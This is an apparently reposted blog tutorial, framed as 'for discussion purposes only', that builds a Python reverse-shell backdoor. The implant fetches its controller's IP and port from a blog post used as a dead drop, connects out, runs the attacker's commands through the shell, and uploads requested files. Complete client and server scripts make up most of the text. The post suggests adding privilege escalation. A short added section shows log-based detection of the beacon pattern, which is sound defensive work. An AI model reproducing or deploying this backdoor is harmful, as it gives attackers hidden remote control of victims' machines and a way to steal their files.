Python reverse shell backdoor bound to a 51CTO blog

Source: Internet
Author: User
Tags: python, script

For discussion purposes only.

Besides 51CTO, other media such as Weibo can of course be used as well; 51CTO is used here.

Idea: Suppose we have planted a Trojan on a machine. Inside it we write our own server IP, but our IP may change. A domain name would certainly solve this, but it is not very elegant, and domain names cost money, so we need an intermediary instead.


First, what is a reverse shell? Its advantage is that the attacked host may restrict inbound connections, i.e. allow connections to only one port and block all others. In that case we need the attacked host to actively connect out to our server; our server just listens on a port and waits for the attacked host to connect.

Implementation principle:

The target host visits the 51CTO blog page to obtain the server IP and port it needs to connect to.

[Screenshot: Clipboard.png]


How is it implemented?

Note: since the purpose is educational, there are no advanced features (and I could not write them anyway); what follows is just a simple TCP client and TCP server.


First, create a simple TCP server that listens for the connecting TCP client.

```python
#coding: utf-8
import socket

IP = "your IP"    # placeholder: address to listen on
PORT = 0          # placeholder: port to listen on

def connect():
    ### create the socket object
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ### bind the IP and port
    s.bind((IP, PORT))
    ### allow one connection (set as you like)
    s.listen(1)
    ### call accept and start listening
    conn, addr = s.accept()
    ### print the client connection info; the result is a tuple of IP and port
    print "---> we got a connection from: ", addr
    ### loop to receive and send commands
    while True:
        command = raw_input("shell>")
        ### if the command contains the keyword exit, close the connection
        if "exit" in command:
            conn.send("exit")
            conn.close()
            break
        else:
            conn.send(command)
            print conn.recv(1024)

def main():
    connect()

if __name__ == '__main__':
    main()
```

Then create a TCP client to connect to the TCP server.

```python
import socket
import subprocess
import os

host = "server-side IP"   # placeholder
port = 0                  # placeholder: server port

def connect(host, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    while True:
        command = s.recv(1024)
        if "exit" in command:
            s.close()
            break
        else:
            ### the command sent by the server is executed through subprocess
            cmd = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE,
                                   stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            ### return standard output and standard error
            s.send(cmd.stdout.read())
            s.send(cmd.stderr.read())

def main():
    connect(host, port)

if __name__ == '__main__':
    main()
```

Because the client does not check whether the server is up, we must run the server first and then the client. The result is as follows:

[Screenshot: Clipboard2.png]

At this point, the first step is complete.

Now we need to put the server IP and port on the 51CTO blog.

[Screenshot: Clipboard3.png]

Now create an article in the blog as shown in the screenshot.

Then use the two libraries requests and BeautifulSoup to get the information we want.

```python
import requests
import json
from bs4 import BeautifulSoup

url = "http://youerning.blog.51cto.com/"
```

Do some simple reconnaissance of the page before fetching it.

[Screenshot: Clipboard4.png]

Through Chrome's debugging mode we locate the content we want: it sits in a div with class="artcontent mt10". Of course there are many ways to filter out the information we need with BeautifulSoup; this is just one of them.

```python
def gethost(url):
    ret = requests.get(url).content
    soup = BeautifulSoup(ret, "html.parser")
    for i in soup.find_all("div", class_="artcontent mt10"):
        if i.string.startswith("{"):
            ret = str(i.string)
            ret = json.loads(ret)
            return ret["host"], ret["port"]

print gethost(url)
```

The result of running it is as follows:

[Screenshot: Clipboard5.png]

At this point the second part is complete; the full code is as follows.

Client .py file

```python
import socket
import subprocess
import os
import requests
import json
from bs4 import BeautifulSoup

url = "http://youerning.blog.51cto.com/"

def transfer(s, path):
    if os.path.exists(path):
        f = open(path, "rb")
        packet = f.read(1024)
        while packet != "":
            s.send(packet)
            packet = f.read(1024)
        s.send("Done")
        f.close()

def gethost(url):
    ret = requests.get(url).content
    soup = BeautifulSoup(ret, "html.parser")
    for i in soup.find_all("div", class_="artcontent mt10"):
        if i.string.startswith("{"):
            ret = str(i.string)
            ret = json.loads(ret)
            return ret["host"], ret["port"]

def connect(host, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    while True:
        command = s.recv(1024)
        if "exit" in command:
            s.close()
            break
        elif "grab" in command:
            grab, path = command.split("*")
            try:
                transfer(s, path)
            except Exception, e:
                s.send(str(e))
                pass
        else:
            cmd = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE,
                                   stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            s.send(cmd.stdout.read())
            s.send(cmd.stderr.read())

def main():
    host, port = gethost(url)
    connect(host, port)

main()
```

Server-side .py file

```python
#coding:utf-8
import socket

ip = "Your IP"   # placeholder
port = 0         # placeholder: bound port

def transfer(conn, command):
    conn.send(command)
    f = open("text.text", "wb")
    while True:
        bits = conn.recv(1024)
        if "unable to find out the file" in bits:
            print "---- unable to find the file"
            break
        if bits.endswith("Done"):
            print "Done"
            f.close()
            break
        f.write(bits)
    f.close()

def connect():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((ip, port))
    s.listen(1)
    conn, addr = s.accept()
    print "---> we got a connection from: ", addr
    while True:
        command = raw_input("shell>")
        if "exit" in command:
            conn.send("exit")
            conn.close()
            break
        elif "grab" in command:
            transfer(conn, command)
        else:
            conn.send(command)
            print conn.recv(1024)

def main():
    connect()

main()
```
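From the defender's side, the behaviour the two scripts above produce is distinctive: a process first fetches a web page (the blog used as a dead drop) and moments later opens an outbound TCP connection to an uncommon port. The following is an added example, not code from the original post, that correlates those two events over constructed endpoint log lines; the log format, the function names and the 203.0.113.x addresses are assumptions made for this example.

```python
# Added example (not from the original post): flag a process that fetches a web page
# and then, shortly afterwards, connects out to an uncommon port (dead-drop resolver pattern).
# The log format below is constructed for this example; 203.0.113.x are documentation IPs.
import re
from datetime import datetime, timedelta

SAMPLE_LOG = """\
2016-02-01T10:00:01 ws1 4242 http_get host=youerning.blog.51cto.com
2016-02-01T10:00:03 ws1 4242 tcp_connect dst=203.0.113.5:4444
2016-02-01T10:05:00 ws1 5100 http_get host=youerning.blog.51cto.com
2016-02-01T10:05:01 ws1 5100 tcp_connect dst=203.0.113.9:443
2016-02-01T10:09:00 ws2 610 tcp_connect dst=203.0.113.5:4444
2016-02-01T10:20:00 ws2 7000 http_get host=youerning.blog.51cto.com
2016-02-01T10:25:00 ws2 7000 tcp_connect dst=203.0.113.7:9001
"""
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<pid>\d+) "
                    r"(?P<event>\w+) (?P<key>\w+)=(?P<val>\S+)$")

def parse_line(line):
    """Parse one constructed log line into a dict, or return None if it is malformed."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%S")
    return ev

def find_dead_drop_beacons(lines, window_seconds=60, common_ports=(80, 443)):
    """Return (host, pid, page, dst) for every process whose web fetch was followed,
    within window_seconds, by a TCP connection to a port not in common_ports."""
    last_fetch = {}  # (host, pid) -> (time of the most recent fetch, page host)
    hits = []
    for raw in lines:
        ev = parse_line(raw)
        if ev is None:
            continue
        key = (ev["host"], ev["pid"])
        if ev["event"] == "http_get":
            last_fetch[key] = (ev["ts"], ev["val"])
        elif ev["event"] == "tcp_connect" and key in last_fetch:
            fetched_at, page = last_fetch[key]
            port = int(ev["val"].rsplit(":", 1)[1])
            recent = ev["ts"] - fetched_at <= timedelta(seconds=window_seconds)
            if recent and port not in common_ports:
                hits.append((ev["host"], ev["pid"], page, ev["val"]))
    return hits

if __name__ == "__main__":
    for hit in find_dead_drop_beacons(SAMPLE_LOG.splitlines()):
        print("suspected dead-drop resolver: host=%s pid=%s page=%s -> %s" % hit)
```

On the sample lines only pid 4242 is flagged: pid 5100 connects to 443, pid 610 never fetched a page, and pid 7000 connects outside the 60-second window (widening the window would catch it).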


PostScript: The two complete Python scripts above add a transfer function for transferring files, which is a bit of an easter egg, although I don't know what the point of the easter egg is. Many more functions could be added, such as searching for files, privilege escalation and so on.

This article is from the "Ear Notebook" blog, please make sure to keep this source http://youerning.blog.51cto.com/10513771/1740646
